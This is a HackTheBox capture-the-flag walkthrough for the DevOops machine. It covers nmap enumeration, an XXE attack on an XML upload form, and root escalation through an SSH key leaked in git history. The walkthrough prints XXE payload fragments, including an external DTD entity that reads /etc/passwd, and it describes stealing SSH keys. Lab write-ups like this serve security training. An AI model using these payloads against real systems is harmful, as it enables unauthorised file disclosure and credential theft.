DevOops Box Writeup & Walkthrough – [HTB] – HackTheBox

This article outlines the steps to hack the DevOops box on HackTheBox, aiming to retrieve both user.txt and root.txt using tools available in Kali Linux.

DevOops is a challenge machine hosted on Hack The Box, a platform that allows cybersecurity enthusiasts to test their penetration testing skills and share ideas and methodologies with others. The platform is continuously updated with new challenges.

We begin with an NMAP scan to identify open ports on the server.

Ports Scan

The scan reveals two open ports: 22/TCP for SSH and 5000/TCP for a web service.

Next, we explore the web service hosted on

DevOops Website
DevOops Website

It appears to be a simple web application that allows XML file uploads.

We start by uploading a benign XML file to understand how the server processes it.



After submission, the server returns a message indicating successful upload.

Website Returns Info
Website Returns Info

Next, we exploit a potential XXE vulnerability by submitting a malicious XML payload.


<!--?xml version="1.0" ?-->
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "">%remote;%int;%trick;]>

We host a DTD file on our Kali machine to facilitate this.


<!ENTITY b SYSTEM "file:///etc/passwd" >

Following the exploit, we can read the /etc/passwd file.

XXE Read /etc/passwd File
XXE Read /etc/passwd File

We then attempt to access the SSH key for further exploitation.

XXE Read SSH Key File
XXE Read SSH Key File

This allows us to successfully retrieve the user.txt file.

Obtain User.txt
Obtain User.txt

Identifying a user named “git,” we attempt to log in using the credentials and information we’ve gathered.

Login as Git
Login as Git

We examine the .bash_history for clues about potential vulnerabilities.

Git User Bash History
Git User Bash History

This leads us to discover the initialization of a git repository in the blogfeed folder. Checking the git log, we find a commit that adds an SSH key.

Blogfeed Git Log
Blogfeed Git Log

Git Commit
Git Commit

Using this SSH key, we successfully log into the server as the root user and retrieve the root.txt file.

Obtain Root.txt
Obtain Root.txt

The DevOops box presents challenges such as crafting an XXE payload and leveraging Git to escalate privileges. These steps underline the importance of thorough enumeration and understanding the underlying application logic.

For more HackTheBox writeups, visit HackTheBox Writeups by SpZ.